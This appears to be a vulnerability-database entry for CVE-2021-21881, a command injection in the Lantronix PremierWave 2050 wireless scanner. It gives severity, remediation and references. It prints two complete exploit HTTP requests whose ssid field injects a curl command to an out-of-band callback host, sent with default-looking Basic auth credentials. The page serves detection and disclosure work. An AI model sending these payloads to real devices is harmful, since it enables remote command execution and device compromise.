🔙 목록으로 돌아가기

CVE-2021-21881: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection

TitleLantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access, data leakage, or complete compromise of the affected device.
RemediationApply the latest firmware update provided by Lantronix to mitigate the vulnerability.
CVSS Score9.9
EPSS Score0.92333
CVE IDCVE-2021-21881
CWE IDCWE-78
Tags cve2021 cve lantronix rce oast cisco vkev vuln

🔍 Vulnerability Description

Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.

🌐 HTTP Request

POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 149
Authorization: Basic dXNlcjp1c2Vy
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://d5jn6lple0o0jr0vgmkggxts1kodo8ukg.oast.site -H 'User-Agent: IcskAm' #
POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Connection: close
Content-Length: 147
Authorization: Basic YWRtaW46UEFTUw==
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid="'; curl http://d5jn6lple0o0jr0vgmkgmencqj73u5uaj.oast.site -H 'User-Agent: IcskAm'

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21881.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-21881.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A